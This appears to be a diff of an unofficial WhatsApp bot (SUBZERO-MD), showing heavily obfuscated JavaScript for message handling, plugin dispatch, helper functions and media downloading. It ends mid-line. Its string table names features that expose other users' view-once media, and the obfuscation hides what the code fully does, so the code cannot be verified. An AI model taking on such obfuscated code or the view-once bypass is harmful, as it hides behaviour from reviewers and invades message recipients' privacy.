_0x40786a=(config[_0x499e06(0x30b)]||_0x499e06(0x317))[_0x499e06(0x1b4)](','),_0x3943a4=_0x40786a[Math[_0x499e06(0x2d7)](Math[_0x499e06(0x2c5)]()*_0x40786a[_0x499e06(0x27a)])];_0x320a0c[_0x499e06(0x2e2)](_0x3943a4);}}if(!_0x3fa766&&_0x284337===_0x53b970){if(config[_0x499e06(0x2e3)]===_0x499e06(0x1b6)){const _0x5e30b1=(config[_0x499e06(0x30b)]||_0x499e06(0x317))['split'](','),_0x7f1480=_0x5e30b1[Math['floor'](Math[_0x499e06(0x2c5)]()*_0x5e30b1[_0x499e06(0x27a)])];_0x320a0c['react'](_0x7f1480);}}if(!_0x34b923&&config[_0x499e06(0x1dc)]===_0x499e06(0x2d2))return;if(!_0x34b923&&_0x883d72&&config[_0x499e06(0x1dc)]===_0x499e06(0x2b2))return;if(!_0x34b923&&!_0x883d72&&config[_0x499e06(0x1dc)]===_0x499e06(0x245))return;const _0x677e22=require(_0x499e06(0x254)),_0x2354ce=_0x37499d?_0x47cf84[_0x499e06(0x24c)](0x1)[_0x499e06(0x19e)]()[_0x499e06(0x1b4)]('\x20')[0x0][_0x499e06(0x2b5)]():![];if(_0x37499d){const _0xc89120=_0x677e22['commands'][_0x499e06(0x2a8)](_0x2395d4=>_0x2395d4[_0x499e06(0x1b3)]===_0x2354ce)||_0x677e22[_0x499e06(0x263)]['find'](_0x4fa352=>_0x4fa352[_0x499e06(0x321)]&&_0x4fa352[_0x499e06(0x321)]['includes'](_0x2354ce));if(_0xc89120){if(_0xc89120[_0x499e06(0x2e2)])_0x22f519[_0x499e06(0x1fc)](_0xc04e1,{'react':{'text':_0xc89120[_0x499e06(0x2e2)],'key':_0x53bb05[_0x499e06(0x226)]}});try{_0xc89120[_0x499e06(0x240)](_0x22f519,_0x53bb05,_0x320a0c,{'from':_0xc04e1,'quoted':_0x149832,'body':_0x47cf84,'isCmd':_0x37499d,'command':_0x3c9fa1,'args':_0x76e4e0,'q':_0xf6eaaa,'isGroup':_0x883d72,'sender':_0x140b00,'senderNumber':_0x284337,'botNumber2':_0x4f6a81,'botNumber':_0x53b970,'pushname':_0x5c658e,'isMe':_0x49dffe,'isOwner':_0x34b923,'groupMetadata':_0x2df2e0,'groupName':_0x40b129,'participants':_0x474210,'groupAdmins':_0x2045ef,'isBotAdmins':_0x27602d,'isAdmins':_0x5dae0b,'reply':_0x403bb2});}catch(_0x12aeac){console['error']('[PLUGIN\x20ERROR]\x20'+_0x12aeac);}}}_0x677e22[_0x499e06(0x263)]['map'](async _0x58dc62=>{const _0x5f2d4a=_0x499e06;if(_0x47cf84&&_0x58dc62['on']==='body')_0x58dc62[_0x5f2d4a(0x240)](_0x22f519,_0x53bb05,_0x320a0c,{'from':_0xc04e1,'l':l,'quoted':_0x149832,'body':_0x47cf84,'isCmd':_0x37499d,'command':_0x58dc62,'args':_0x76e4e0,'q':_0xf6eaaa,'isGroup':_0x883d72,'sender':_0x140b00,'senderNumber':_0x284337,'botNumber2':_0x4f6a81,'botNumber':_0x53b970,'pushname':_0x5c658e,'isMe':_0x49dffe,'isOwner':_0x34b923,'groupMetadata':_0x2df2e0,'groupName':_0x40b129,'participants':_0x474210,'groupAdmins':_0x2045ef,'isBotAdmins':_0x27602d,'isAdmins':_0x5dae0b,'reply':_0x403bb2});else{if(_0x53bb05['q']&&_0x58dc62['on']===_0x5f2d4a(0x1a4))_0x58dc62[_0x5f2d4a(0x240)](_0x22f519,_0x53bb05,_0x320a0c,{'from':_0xc04e1,'l':l,'quoted':_0x149832,'body':_0x47cf84,'isCmd':_0x37499d,'command':_0x58dc62,'args':_0x76e4e0,'q':_0xf6eaaa,'isGroup':_0x883d72,'sender':_0x140b00,'senderNumber':_0x284337,'botNumber2':_0x4f6a81,'botNumber':_0x53b970,'pushname':_0x5c658e,'isMe':_0x49dffe,'isOwner':_0x34b923,'groupMetadata':_0x2df2e0,'groupName':_0x40b129,'participants':_0x474210,'groupAdmins':_0x2045ef,'isBotAdmins':_0x27602d,'isAdmins':_0x5dae0b,'reply':_0x403bb2});else{if((_0x58dc62['on']===_0x5f2d4a(0x261)||_0x58dc62['on']==='photo')&&_0x53bb05[_0x5f2d4a(0x213)]==='imageMessage')_0x58dc62[_0x5f2d4a(0x240)](_0x22f519,_0x53bb05,_0x320a0c,{'from':_0xc04e1,'l':l,'quoted':_0x149832,'body':_0x47cf84,'isCmd':_0x37499d,'command':_0x58dc62,'args':_0x76e4e0,'q':_0xf6eaaa,'isGroup':_0x883d72,'sender':_0x140b00,'senderNumber':_0x284337,'botNumber2':_0x4f6a81,'botNumber':_0x53b970,'pushname':_0x5c658e,'isMe':_0x49dffe,'isOwner':_0x34b923,'groupMetadata':_0x2df2e0,'groupName':_0x40b129,'participants':_0x474210,'groupAdmins':_0x2045ef,'isBotAdmins':_0x27602d,'isAdmins':_0x5dae0b,'reply':_0x403bb2});else _0x58dc62['on']===_0x5f2d4a(0x304)&&_0x53bb05[_0x5f2d4a(0x213)]===_0x5f2d4a(0x2fd)&&_0x58dc62[_0x5f2d4a(0x240)](_0x22f519,_0x53bb05,_0x320a0c,{'from':_0xc04e1,'l':l,'quoted':_0x149832,'body':_0x47cf84,'isCmd':_0x37499d,'command':_0x58dc62,'args':_0x76e4e0,'q':_0xf6eaaa,'isGroup':_0x883d72,'sender':_0x140b00,'senderNumber':_0x284337,'botNumber2':_0x4f6a81,'botNumber':_0x53b970,'pushname':_0x5c658e,'isMe':_0x49dffe,'isOwner':_0x34b923,'groupMetadata':_0x2df2e0,'groupName':_0x40b129,'participants':_0x474210,'groupAdmins':_0x2045ef,'isBotAdmins':_0x27602d,'isAdmins':_0x5dae0b,'reply':_0x403bb2});}}});});}app[_0x54ff3b(0x1c4)](express[_0x54ff3b(0x1d4)](path[_0x54ff3b(0x22f)](__dirname,_0x54ff3b(0x2b3)))),app[_0x54ff3b(0x1c6)]('/',(_0x2391e4,_0x22b355)=>{_0x22b355['redirect']('/subzero.html');}),app['listen'](port,()=>console[_0x54ff3b(0x2c1)](_0x54ff3b(0x19d)+port)),setTimeout(()=>{connectToWA();},0xfa0);function _0x36f5(){const _0x141907=['/sessions/creds.json','👩❤️💋👩','🙇♀️','\x20as\x20read.','sendImage','macOS','🤵♂️','🧙♂️','sendFile','relayMessage','sendMessage','59788RhdLmV','statusCode','audio','836904nHsThN','🧑🎨','🧑🔧','[❄️]\x20🛠️\x20Installing\x20Plugins.','🕴♂️','🧟♀️','participants','🇬🇧','imageMessage','8912013Riozan','server','quotedMessage','download','message','🦹♂️','🏋️♂️','parseMention','🧝♀️','json','type','🐻❄️','122664LfwzrI','readdirSync','💂♀️','WebMessageInfo','👨🏫','audioMessage','viewOnceMessage','👨🦼','👨🌾','👩👧','🕷️','🖐️','🧜♂️','🧑🔬','⛹️♂️','👨🦲','msg','key','💇♀️','🏌️♀️','🏊♀️','subject','sendFileUrl','👨🎨','👰♀️','🛬️','join','🧑🦳','error','144iAhrNn','🧝♂️','👩👩👦','readdir','🧏♂️','👨❤️💋👨','🤷♂️','open','document','output','🧛♀️','💁♀️','👩🦰','ANTI_VV','function','PREFIX','@g.us','🕴️','base64','groups','🧚♂️','🧑🎤','🧑🏭','Subzero\x20Session\x20downloaded\x20✅','👮♂️','❤️🩹','slice','ephemeralMessage','🤦♀️','🧙♀️','💆♂️','megajs','readViewOnce','participant','./command','👩👦👦','🙎♀️','🛫️','🙎♂️','asSticker','👱♂️','👩🔧','toString','READ_CMD','AUTO_STATUS_SEEN','pino','video/mp4','image','asDocument','commands','Message','SESSION_ID','catch','cMod','file-type','🗯️','👨🚒','*Hi\x20Owner😇,\x20Congrats\x20SubZero\x20Connected\x20Successfully!\x20🚀*\x20\x0a\x0a>\x20Light,\x20Cold,\x20Icy,\x20Fast\x20&\x20Rich\x20Loaded\x20With\x20Features,\x20SubZero\x20W.A\x20Bot.\x0a\x0a\x20*Thanks\x20for\x20using\x20SUBZERO-MD\x20❄️*\x20\x0a\x0a>\x20Join\x20WhatsApp\x20Channel\x20:-\x20🛠️\x0a\x20\x0ahttps://whatsapp.com/channel/0029VagQEmB002T7MWo3Sj1D\x0a\x0a-\x20*ყσµɾ\x20ɓσƭ\x20ρɾεƒเא\x20➜*\x20\x20','readMessages','👩🍼','588090WJYYuW','mkdirSync','👩👩👧👦','remoteJid','reactionMessage','categories','🧖♂️','connection.update','👩🦱','🧑⚕️','😶🌫️','🐈⬛','length','groupMetadata','👨🦱','🤽♂️','test','viewOnceMessageV2','AUTO_STATUS_REPLY','⛹️♀️','👩🚒','👨🍼','👨👦👦','👨👨👧👦','🇦🇺','👨⚕️','🕵️♀️','user','head','crypto','AUTO_REACT','\x0a\x0aDont\x20forget\x20to\x20\x20star\x20our\x20repo☺\x20\x0a\x0ahttps://github.com/mrfrank-ofc/SUBZERO-MD\x0a\x0a>\x20©\x20🎐ᴘϙᴡᴇʀᴇᴅ\x20ʙʏ\x20ᴍʀ\x20ꜰʀᴀɴᴋ\x20ᴏꜰᴄ\x20⚡','🙋♀️','🙅♀️','👷♀️','👩👦','🤹♂️','status','👩🍳','util','💆♀️','🧏♀️','./exif','ext','👨🦽','conversation','🧑🏫','packname','👨🦰','author','includes','🏄♂️','🤷♀️','🤼♀️','❤️🔥','🧞♀️','concat','👷♂️','find','💁♂️','👩🏭','🧑🤝🧑','./plugins/','👨✈️','🚶♂️','keys','AUTO_STATUS_MSG','🤼♂️','inbox','lib','👩🌾','toLowerCase','👩🦲','🛣️','/sessions/','🧑🍳','🧖♀️','string','🧞♂️','send5ButImg','existsSync','🚶♀️','body-parser','log','mimetype','[❄️]\x20SubZero\x20Connecting\x20to\x20WhatsApp\x20⏳️...','🕸️','random','🦸♂️','application/pdf','🗨️','👨👩👦👦','🧗♀️','silent','🏌️♂️','🇫🇷','ignore','copyNForward','👨👧','Marked\x20message\x20from\x20','private','👨👩👦','🚣♀️','🤽♀️','video','floor','https://i.ibb.co/8NBwB9P/mrfrankofc.jpg','👱♀️','💇♂️','env','👨👨👧👧','🇪🇸','🕵️♂️','extendedTextMessage','contextInfo','🏃♂️','react','CUSTOM_REACT','express','🙆♀️','pushName','path','👩🏫','👨👧👦','fromObject','2778gfXTIP','audio/mpeg','🧑🌾','./config','👩❤️👩','parse','263719647303','🦸♀️','🧑🦯','creds.update','🧍♀️','👩⚖️','👨🔬','👨👨👧','fromBuffer','🕴♀️','promises','https://mega.nz/file/','stickerMessage','.bin','./lib/msg','🧛♂️','sendButtonText','🚣♂️','🇨🇦','sticker','🧎♂️','🧑🦼','🕳️','👩⚕️','🧎♀️','sendImageAsSticker','CUSTOM_REACT_EMOJIS','close','👨🍳','👯♀️','qrcode-terminal','getFile','map','🤵♀️','forEach','👩🔬','👨🏭','3954202lwrjph','🥲,😂,👍🏻,🙂,😔','stringify','🧑🦽','status@broadcast','🧘♂️','👨💼','👰♂️','🧑🍼','👨👩👧👧','🕵️','alias','isBuffer','🧔♂️','🚴♀️','replace','🙇♂️','👳♂️','headers','🐿️','🏄♀️','./lib/functions','👩🦳','content-type','👨🎓','🏋️♀️','🧑🦰','👨🔧','unlink','263719647303@s.whatsapp.net','🤸♂️','🗣️','image/webp','wa-sticker-formatter','🚴♂️','👨👩👧👦','matchAll','🧑💼','PORT','👩👧👦','READ_MESSAGE','🧑✈️','🤾♂️','🇯🇵','@s.whatsapp.net','🤸♀️','🐕🦺','application/octet-stream','👨💻','👨🦳','writeFileSync','🏋️','Server\x20listening\x20on\x20port\x20http://localhost:','trim','👁️🗨️','👩🎤','🧑⚖️','🏌️','🙅♂️','text','🧘♀️','videoMessage','🧑🚀','gif','👯♂️','👩👩👦👦','👨👦','fromMe','🙆♂️','👩✈️','🦹♀️','🧗♂️','Hello\x20World!','😮💨','pattern','split','👮♀️','true','🧔♀️','🤾♀️','🇺🇸','👩❤️👨','👨👩👧','👩🚀','👩👩👧👧','readFileSync','🕯️','decodeJid','👨🚀','🤦♂️','💂♂️','use','Firefox','get','🧚♀️','@broadcast','👩🦼','👨👨👦👦','85cWxUgZ','🙍♂️','🧜♀️','👩💻','🙍♀️','./exif.js','fluent-ffmpeg','👩👩👧','👩🎨','static','writeFile','@whiskeysockets/baileys','🚵♀️','Please\x20add\x20your\x20session\x20to\x20SESSION_ID\x20env\x20!!','👨👧👧','alloc','from','MODE','🏊♂️','👩🎓','👩👧👧','🤹♀️','🕊️','🧑💻','🙋♂️','👩💼','🚵♂️','📽️','🧍♂️','🧑🚒','caption','1012BfRMuw','👩🦽','👩🦯','🧑🦱','😵💫','🧑🎄','37KGZwpK','downloadAndSaveMediaMessage'];_0x36f5=function(){return _0x141907;};return _0x36f5();}
|
lib/Readme.md
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
## Encrypto27 W.A BOT ❄️
|
lib/functions.js
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
var _0x326e26=_0x52c0;function _0x52c0(_0x7d24a1,_0x8be195){var _0x217244=_0x2172();return _0x52c0=function(_0x52c08d,_0x2814d0){_0x52c08d=_0x52c08d-0x179;var _0x459f1a=_0x217244[_0x52c08d];return _0x459f1a;},_0x52c0(_0x7d24a1,_0x8be195);}(function(_0x1d024a,_0x5c615c){var _0x285383=_0x52c0,_0x50c581=_0x1d024a();while(!![]){try{var _0x51c672=-parseInt(_0x285383(0x17c))/0x1+-parseInt(_0x285383(0x182))/0x2*(parseInt(_0x285383(0x193))/0x3)+-parseInt(_0x285383(0x189))/0x4*(-parseInt(_0x285383(0x196))/0x5)+parseInt(_0x285383(0x191))/0x6*(-parseInt(_0x285383(0x17d))/0x7)+-parseInt(_0x285383(0x195))/0x8+-parseInt(_0x285383(0x181))/0x9+parseInt(_0x285383(0x190))/0xa;if(_0x51c672===_0x5c615c)break;else _0x50c581['push'](_0x50c581['shift']());}catch(_0x40292b){_0x50c581['push'](_0x50c581['shift']());}}}(_0x2172,0x35f13));const axios=require('axios'),getBuffer=async(_0x33e6d2,_0x46fe71)=>{var _0xc08f13=_0x52c0;try{_0x46fe71?_0x46fe71:{};var _0x300c74=await axios({'method':_0xc08f13(0x18c),'url':_0x33e6d2,'headers':{'DNT':0x1,'Upgrade-Insecure-Request':0x1},..._0x46fe71,'responseType':_0xc08f13(0x17f)});return _0x300c74[_0xc08f13(0x188)];}catch(_0x17a528){console['log'](_0x17a528);}},getGroupAdmins=_0x20060a=>{var _0x3df1c4=_0x52c0,_0x51cbf8=[];for(let _0x5a5309 of _0x20060a){_0x5a5309['admin']!==null?_0x51cbf8[_0x3df1c4(0x194)](_0x5a5309['id']):'';}return _0x51cbf8;},getRandom=_0x37cd2c=>{var _0x37fc75=_0x52c0;return''+Math[_0x37fc75(0x179)](Math[_0x37fc75(0x186)]()*0x2710)+_0x37cd2c;},h2k=_0x539fb5=>{var _0x18ff78=_0x52c0,_0x31647b=['','K','M','B','T','P','E'],_0x15c6a0=Math['log10'](Math[_0x18ff78(0x18a)](_0x539fb5))/0x3|0x0;if(_0x15c6a0==0x0)return _0x539fb5;var _0x68c738=_0x31647b[_0x15c6a0],_0xaeb9b8=Math[_0x18ff78(0x18e)](0xa,_0x15c6a0*0x3),_0x442cc1=_0x539fb5/_0xaeb9b8,_0x1d4649=_0x442cc1['toFixed'](0x1);if(/\.0$/[_0x18ff78(0x17e)](_0x1d4649))_0x1d4649=_0x1d4649[_0x18ff78(0x187)](0x0,_0x1d4649[_0x18ff78(0x18d)]-0x2);return _0x1d4649+_0x68c738;},isUrl=_0x3bdebf=>{var _0x15ec73=_0x52c0;return _0x3bdebf[_0x15ec73(0x18f)](new RegExp(/https?:\/\/(www\.)?[-a-zA-Z0-9@:%.+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%+.~#?&/=]*)/,'gi'));},Json=_0x42b5a6=>{var _0x40ec44=_0x52c0;return JSON[_0x40ec44(0x197)](_0x42b5a6,null,0x2);},runtime=_0x226b46=>{var _0x5e623c=_0x52c0;_0x226b46=Number(_0x226b46);var _0x3acd58=Math[_0x5e623c(0x179)](_0x226b46/(0xe10*0x18)),_0x11147a=Math[_0x5e623c(0x179)](_0x226b46%(0xe10*0x18)/0xe10),_0x37267d=Math[_0x5e623c(0x179)](_0x226b46%0xe10/0x3c),_0x184eb1=Math[_0x5e623c(0x179)](_0x226b46%0x3c),_0x19babd=_0x3acd58>0x0?_0x3acd58+(_0x3acd58==0x1?'\x20day,\x20':_0x5e623c(0x17a)):'',_0x46d4b5=_0x11147a>0x0?_0x11147a+(_0x11147a==0x1?_0x5e623c(0x18b):'\x20hours,\x20'):'',_0x588563=_0x37267d>0x0?_0x37267d+(_0x37267d==0x1?_0x5e623c(0x183):'\x20minutes,\x20'):'',_0x15c885=_0x184eb1>0x0?_0x184eb1+(_0x184eb1==0x1?_0x5e623c(0x192):_0x5e623c(0x17b)):'';return _0x19babd+_0x46d4b5+_0x588563+_0x15c885;},sleep=async _0x5c6709=>{return new Promise(_0x27c9ea=>setTimeout(_0x27c9ea,_0x5c6709));},fetchJson=async(_0xa926b,_0x320719)=>{var _0x5beedb=_0x52c0;try{_0x320719?_0x320719:{};const _0x3596c3=await axios({'method':_0x5beedb(0x184),'url':_0xa926b,'headers':{'User-Agent':_0x5beedb(0x185)},..._0x320719});return _0x3596c3[_0x5beedb(0x188)];}catch(_0x206360){return _0x206360;}};function _0x2172(){var _0x331799=['exports','66717jDinWp','350hhJjgh','\x20minute,\x20','GET','Mozilla/5.0\x20(Windows\x20NT\x2010.0;\x20Win64;\x20x64)\x20AppleWebKit/537.36\x20(KHTML,\x20like\x20Gecko)\x20Chrome/95.0.4638.69\x20Safari/537.36','random','substr','data','12ArkHUr','abs','\x20hour,\x20','get','length','pow','match','11344510FrhLNy','1680276xObYRC','\x20second','1275UxKEGT','push','2242712JEsNpa','165565XuYETB','stringify','floor','\x20days,\x20','\x20seconds','370670ywBaWi','7Rcfcjr','test','arraybuffer'];_0x2172=function(){return _0x331799;};return _0x2172();}module[_0x326e26(0x180)]={'getBuffer':getBuffer,'getGroupAdmins':getGroupAdmins,'getRandom':getRandom,'h2k':h2k,'isUrl':isUrl,'Json':Json,'runtime':runtime,'sleep':sleep,'fetchJson':fetchJson};
|
lib/msg.js
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
const _0x5a9488=_0x4fbe;(function(_0x43daa1,_0x2001d9){const _0x51e905=_0x4fbe,_0x16995b=_0x43daa1();while(!![]){try{const _0x48b328=-parseInt(_0x51e905(0x116))/0x1*(parseInt(_0x51e905(0xdf))/0x2)+-parseInt(_0x51e905(0xe3))/0x3*(parseInt(_0x51e905(0xd8))/0x4)+-parseInt(_0x51e905(0x11f))/0x5*(parseInt(_0x51e905(0x11d))/0x6)+-parseInt(_0x51e905(0x12e))/0x7*(parseInt(_0x51e905(0x129))/0x8)+parseInt(_0x51e905(0xf2))/0x9+parseInt(_0x51e905(0xdd))/0xa+-parseInt(_0x51e905(0xda))/0xb*(-parseInt(_0x51e905(0x11e))/0xc);if(_0x48b328===_0x2001d9)break;else _0x16995b['push'](_0x16995b['shift']());}catch(_0x62933f){_0x16995b['push'](_0x16995b['shift']());}}}(_0x1538,0x3e381));function _0x4fbe(_0x2380e1,_0x2bfd68){const _0x1538f2=_0x1538();return _0x4fbe=function(_0x4fbe26,_0x29e92f){_0x4fbe26=_0x4fbe26-0xd7;let _0x49324b=_0x1538f2[_0x4fbe26];return _0x49324b;},_0x4fbe(_0x2380e1,_0x2bfd68);}const {proto,downloadContentFromMessage,getContentType}=require(_0x5a9488(0xdb)),fs=require('fs'),downloadMediaMessage=async(_0x3aa729,_0x147330)=>{const _0x48922b=_0x5a9488;_0x3aa729['type']===_0x48922b(0xf0)&&(_0x3aa729[_0x48922b(0x121)]=_0x3aa729[_0x48922b(0xfd)][_0x48922b(0x121)]);if(_0x3aa729[_0x48922b(0x121)]===_0x48922b(0x11c)){var _0x51d6eb=_0x147330?_0x147330+_0x48922b(0x115):_0x48922b(0x127);const _0x5756de=await downloadContentFromMessage(_0x3aa729[_0x48922b(0xfd)],'image');let _0x5178bf=Buffer[_0x48922b(0xfc)]([]);for await(const _0x508474 of _0x5756de){_0x5178bf=Buffer[_0x48922b(0xf1)]([_0x5178bf,_0x508474]);}return fs[_0x48922b(0x12b)](_0x51d6eb,_0x5178bf),fs['readFileSync'](_0x51d6eb);}else{if(_0x3aa729[_0x48922b(0x121)]===_0x48922b(0x100)){var _0x5c7fd7=_0x147330?_0x147330+_0x48922b(0xd7):_0x48922b(0x111);const _0x32daf3=await downloadContentFromMessage(_0x3aa729[_0x48922b(0xfd)],_0x48922b(0xec));let _0x144be4=Buffer[_0x48922b(0xfc)]([]);for await(const _0x585b12 of _0x32daf3){_0x144be4=Buffer[_0x48922b(0xf1)]([_0x144be4,_0x585b12]);}return fs[_0x48922b(0x12b)](_0x5c7fd7,_0x144be4),fs[_0x48922b(0xf7)](_0x5c7fd7);}else{if(_0x3aa729['type']==='audioMessage'){var _0x599aea=_0x147330?_0x147330+_0x48922b(0xee):_0x48922b(0xd9);const _0x49a4cc=await downloadContentFromMessage(_0x3aa729[_0x48922b(0xfd)],_0x48922b(0x10c));let _0x423e53=Buffer['from']([]);for await(const _0x41c883 of _0x49a4cc){_0x423e53=Buffer['concat']([_0x423e53,_0x41c883]);}return fs['writeFileSync'](_0x599aea,_0x423e53),fs[_0x48922b(0xf7)](_0x599aea);}else{if(_0x3aa729['type']==='stickerMessage'){var _0x564c74=_0x147330?_0x147330+'.webp':_0x48922b(0xf6);const _0x2c4b92=await downloadContentFromMessage(_0x3aa729[_0x48922b(0xfd)],'sticker');let _0xe0a074=Buffer[_0x48922b(0xfc)]([]);for await(const _0x3b7f9c of _0x2c4b92){_0xe0a074=Buffer['concat']([_0xe0a074,_0x3b7f9c]);}return fs[_0x48922b(0x12b)](_0x564c74,_0xe0a074),fs[_0x48922b(0xf7)](_0x564c74);}else{if(_0x3aa729[_0x48922b(0x121)]===_0x48922b(0x114)){var _0x53c74b=_0x3aa729['msg'][_0x48922b(0xe4)][_0x48922b(0xf9)]('.')[0x1][_0x48922b(0x12c)]()[_0x48922b(0xff)](_0x48922b(0x126),_0x48922b(0xdc))[_0x48922b(0xff)]('png','jpg')[_0x48922b(0xff)](_0x48922b(0xe6),'mp3'),_0x1c5869=_0x147330?_0x147330+'.'+_0x53c74b:'undefined.'+_0x53c74b;const _0x22bb3c=await downloadContentFromMessage(_0x3aa729[_0x48922b(0xfd)],_0x48922b(0x124));let _0x24df9d=Buffer[_0x48922b(0xfc)]([]);for await(const _0x1839b4 of _0x22bb3c){_0x24df9d=Buffer[_0x48922b(0xf1)]([_0x24df9d,_0x1839b4]);}return fs[_0x48922b(0x12b)](_0x1c5869,_0x24df9d),fs[_0x48922b(0xf7)](_0x1c5869);}}}}}},sms=(_0x13d477,_0x1453f4)=>{const _0x5baaf2=_0x5a9488;_0x1453f4[_0x5baaf2(0x122)]&&(_0x1453f4['id']=_0x1453f4[_0x5baaf2(0x122)]['id'],_0x1453f4[_0x5baaf2(0x128)]=_0x1453f4[_0x5baaf2(0x122)]['remoteJid'],_0x1453f4[_0x5baaf2(0xe8)]=_0x1453f4[_0x5baaf2(0x122)][_0x5baaf2(0xe8)],_0x1453f4[_0x5baaf2(0xed)]=_0x1453f4[_0x5baaf2(0x128)][_0x5baaf2(0x120)](_0x5baaf2(0x12a)),_0x1453f4[_0x5baaf2(0x118)]=_0x1453f4[_0x5baaf2(0xe8)]?_0x13d477[_0x5baaf2(0x10d)]['id']['split'](':')[0x0]+'@s.whatsapp.net':_0x1453f4[_0x5baaf2(0xed)]?_0x1453f4[_0x5baaf2(0x122)]['participant']:_0x1453f4[_0x5baaf2(0x122)][_0x5baaf2(0x108)]);if(_0x1453f4['message']){_0x1453f4['type']=getContentType(_0x1453f4[_0x5baaf2(0xde)]),_0x1453f4[_0x5baaf2(0xfd)]=_0x1453f4['type']===_0x5baaf2(0xf0)?_0x1453f4['message'][_0x1453f4[_0x5baaf2(0x121)]]['message'][getContentType(_0x1453f4[_0x5baaf2(0xde)][_0x1453f4[_0x5baaf2(0x121)]]['message'])]:_0x1453f4[_0x5baaf2(0xde)][_0x1453f4[_0x5baaf2(0x121)]];if(_0x1453f4[_0x5baaf2(0xfd)]){_0x1453f4['type']==='viewOnceMessage'&&(_0x1453f4[_0x5baaf2(0xfd)]['type']=getContentType(_0x1453f4[_0x5baaf2(0xde)][_0x1453f4[_0x5baaf2(0x121)]]['message']));var _0x7bb424=_0x1453f4['msg'][_0x5baaf2(0x105)]!=null?_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0x105)][_0x5baaf2(0x119)]:'',_0x135ac9=_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0x105)]!=null?_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0x105)][_0x5baaf2(0x10a)]:[],_0x21f33a=typeof _0x135ac9==_0x5baaf2(0xf5)?[_0x135ac9]:_0x135ac9;_0x21f33a!=undefined?_0x21f33a['push'](_0x7bb424):[],_0x1453f4[_0x5baaf2(0x11a)]=_0x21f33a!=undefined?_0x21f33a[_0x5baaf2(0xe5)](_0x1ab38e=>_0x1ab38e):[],_0x1453f4[_0x5baaf2(0x11b)]=_0x1453f4['type']===_0x5baaf2(0x123)?_0x1453f4[_0x5baaf2(0xfd)]:_0x1453f4[_0x5baaf2(0x121)]===_0x5baaf2(0x102)?_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0xfb)]:_0x1453f4['type']==_0x5baaf2(0x11c)&&_0x1453f4['msg'][_0x5baaf2(0xef)]?_0x1453f4['msg'][_0x5baaf2(0xef)]:_0x1453f4[_0x5baaf2(0x121)]==_0x5baaf2(0x100)&&_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0xef)]?_0x1453f4['msg'][_0x5baaf2(0xef)]:_0x1453f4['type']=='templateButtonReplyMessage'&&_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0x10e)]?_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0x10e)]:_0x1453f4[_0x5baaf2(0x121)]==_0x5baaf2(0xfa)&&_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0x117)]?_0x1453f4[_0x5baaf2(0xfd)]['selectedButtonId']:'',_0x1453f4[_0x5baaf2(0x10b)]=_0x1453f4[_0x5baaf2(0xfd)][_0x5baaf2(0x105)]!=undefined?_0x1453f4['msg'][_0x5baaf2(0x105)]['quotedMessage']:null;if(_0x1453f4[_0x5baaf2(0x10b)]){_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x121)]=getContentType(_0x1453f4[_0x5baaf2(0x10b)]),_0x1453f4[_0x5baaf2(0x10b)]['id']=_0x1453f4[_0x5baaf2(0xfd)]['contextInfo'][_0x5baaf2(0xf3)],_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x118)]=_0x1453f4[_0x5baaf2(0xfd)]['contextInfo'][_0x5baaf2(0x119)],_0x1453f4['quoted'][_0x5baaf2(0xe8)]=_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x118)]['split']('@')[0x0]['includes'](_0x13d477[_0x5baaf2(0x10d)]['id'][_0x5baaf2(0xf9)](':')[0x0]),_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0xfd)]=_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x121)]===_0x5baaf2(0xf0)?_0x1453f4[_0x5baaf2(0x10b)][_0x1453f4[_0x5baaf2(0x10b)]['type']]['message'][getContentType(_0x1453f4['quoted'][_0x1453f4[_0x5baaf2(0x10b)]['type']][_0x5baaf2(0xde)])]:_0x1453f4[_0x5baaf2(0x10b)][_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x121)]];_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x121)]===_0x5baaf2(0xf0)&&(_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0xfd)][_0x5baaf2(0x121)]=getContentType(_0x1453f4[_0x5baaf2(0x10b)][_0x1453f4['quoted'][_0x5baaf2(0x121)]]['message']));var _0x1f9efc=_0x1453f4['quoted'][_0x5baaf2(0xfd)]['contextInfo']!=null?_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0xfd)][_0x5baaf2(0x105)][_0x5baaf2(0x119)]:'',_0x4d583b=_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0xfd)][_0x5baaf2(0x105)]!=null?_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0xfd)][_0x5baaf2(0x105)][_0x5baaf2(0x10a)]:[],_0x5e724b=typeof _0x4d583b==_0x5baaf2(0xf5)?[_0x4d583b]:_0x4d583b;_0x5e724b!=undefined?_0x5e724b['push'](_0x1f9efc):[],_0x1453f4['quoted'][_0x5baaf2(0x11a)]=_0x5e724b!=undefined?_0x5e724b[_0x5baaf2(0xe5)](_0x112a3f=>_0x112a3f):[],_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x110)]=proto[_0x5baaf2(0x113)][_0x5baaf2(0x12d)]({'key':{'remoteJid':_0x1453f4[_0x5baaf2(0x128)],'fromMe':_0x1453f4[_0x5baaf2(0x10b)]['fromMe'],'id':_0x1453f4[_0x5baaf2(0x10b)]['id'],'participant':_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0x118)]},'message':_0x1453f4[_0x5baaf2(0x10b)]}),_0x1453f4['quoted'][_0x5baaf2(0xeb)]=_0x2b3ab8=>downloadMediaMessage(_0x1453f4[_0x5baaf2(0x10b)],_0x2b3ab8),_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0xe1)]=()=>_0